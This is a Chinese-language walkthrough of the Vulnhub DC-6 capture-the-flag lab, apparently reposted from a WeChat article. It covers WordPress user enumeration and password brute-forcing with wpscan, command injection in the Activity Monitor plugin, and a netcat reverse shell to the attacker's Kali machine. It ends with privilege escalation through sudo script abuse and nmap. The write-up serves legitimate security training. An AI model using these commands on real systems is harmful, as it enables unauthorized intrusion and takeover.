> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/6x\_xSa2hGG2dp5QcmxdjVw)
说明:Vulnhub 是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-6 全程只有一个 falg,获取 root 权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。
下载地址:
Download: http://www.five86.com/downloads/DC-6.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent
目标机 IP 地址:192.168.5.141
攻击机 kali IP 地址:192.168.5.135
arp-scan -l
nmap -sV -p- -A 192.168.5.141
访问 web 服务重定向到 http://wordy/ 修改 host 文件,该站点为 WordPress,kali 中自带工具(wpscan)专门扫 WordPress。
扫描一下:
wpscan --url http://wordy/ -e u
存在多个用户 admin/graham/mark/sarah/jens
该作者是有提示的。
字典较大,爆破需要很长的时间要有耐心,解压字典后使用 wpscan 进行爆破。
gunzip -c rockyou.txt.gz > rockyou.txt
wpscan --url http://wordy/ -P /usr/share/wordlists/rockyou.txt -U DCusernames
爆破出用户是 mark,密码是 helpdesk01,WordPress 后台登录。
发现后台页面中安装了 Activity monitor,WordPress Activity monitor 插件存在命令执行的漏洞。
执行命令。
反弹 shell,切换交互模式。
nc 192.168.5.135 7777 -e /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
到 home 目录下看看。
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
发现新用户的以及密码 graham/GSo7isUM1D4
graham 使用 ssh 链接一下。
sudo -l 查看一下能够执行 root 权限的命令。
sudo -u 以指定的用户作为新的身份(不指定则为 root 权限)。 修改该脚本:echo "/bin/bash" > backups.sh 切换用户 jens。
发现 nmap 可以以 root 权限执行。写一个 nmap 脚本,利用 nmap 提权。
nmap 提权成功,拿到 flag。